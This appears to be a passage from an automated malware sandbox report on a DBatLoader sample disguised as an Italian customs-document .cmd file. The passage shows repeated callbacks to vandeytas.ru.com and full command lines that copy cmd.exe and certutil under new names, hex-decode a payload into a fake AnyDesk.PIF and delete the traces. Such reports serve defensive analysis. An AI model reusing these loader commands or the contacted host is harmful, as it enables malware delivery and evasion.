                                                    2024-11-26 08:40:27 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    46192.168.2.44992850.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:40:29 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:29 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:29 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:29 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    47192.168.2.44993550.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:40:31 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:31 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:31 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:31 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    48192.168.2.44994250.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:40:33 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:33 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:33 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:33 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    49192.168.2.44994950.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:40:35 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:35 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:35 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:35 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    50192.168.2.44995550.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:40:37 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:38 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:37 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:38 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    51192.168.2.44996250.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:40:39 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:40 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:39 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:40 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    52192.168.2.44996950.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:40:42 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:42 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:42 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:42 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    53192.168.2.44997650.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:40:44 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:44 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:44 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:44 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    54192.168.2.44998350.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:40:46 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:46 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:46 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:46 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:03:38:41
                                                    Start date:26/11/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" "
                                                    Imagebase:0x7ff7139e0000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:1
                                                    Start time:03:38:41
                                                    Start date:26/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:2
                                                    Start time:03:38:42
                                                    Start date:26/11/2024
                                                    Path:C:\Windows\System32\extrac32.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                                                    Imagebase:0x7ff679a60000
                                                    File size:35'328 bytes
                                                    MD5 hash:41330D97BF17D07CD4308264F3032547
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:3
                                                    Start time:03:38:42
                                                    Start date:26/11/2024
                                                    Path:C:\Users\Public\alpha.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                    Imagebase:0x7ff7e1db0000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 0%, ReversingLabs
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:4
                                                    Start time:03:38:42
                                                    Start date:26/11/2024
                                                    Path:C:\Windows\System32\extrac32.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                    Imagebase:0x7ff679a60000
                                                    File size:35'328 bytes
                                                    MD5 hash:41330D97BF17D07CD4308264F3032547
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:5
                                                    Start time:03:38:42
                                                    Start date:26/11/2024
                                                    Path:C:\Users\Public\alpha.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                                                    Imagebase:0x7ff7e1db0000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:6
                                                    Start time:03:38:42
                                                    Start date:26/11/2024
                                                    Path:C:\Users\Public\kn.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                                                    Imagebase:0x7ff67c4b0000
                                                    File size:1'651'712 bytes
                                                    MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 0%, ReversingLabs
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:7
                                                    Start time:03:38:43
                                                    Start date:26/11/2024
                                                    Path:C:\Users\Public\alpha.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                                                    Imagebase:0x7ff7e1db0000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:8
                                                    Start time:03:38:43
                                                    Start date:26/11/2024
                                                    Path:C:\Users\Public\kn.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                                                    Imagebase:0x7ff67c4b0000
                                                    File size:1'651'712 bytes
                                                    MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:9
                                                    Start time:03:38:44
                                                    Start date:26/11/2024
                                                    Path:C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Imagebase:0x400000
                                                    File size:1'299'968 bytes
                                                    MD5 hash:BCEEA9753420A675AF68CDA43864438E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:Borland Delphi
                                                    Yara matches:
                                                    • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000009.00000003.1720758818.000000007F880000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 68%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:false

                                                    General

                                                    Target ID:10
                                                    Start time:03:38:44
                                                    Start date:26/11/2024
                                                    Path:C:\Users\Public\alpha.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                                                    Imagebase:0x7ff7e1db0000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:11
                                                    Start time:03:38:44
                                                    Start date:26/11/2024
                                                    Path:C:\Users\Public\alpha.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
                                                    Imagebase:0x7ff7e1db0000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:5.5%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:34.5%
                                                      Total number of Nodes:1151
                                                      Total number of Limit Nodes:32
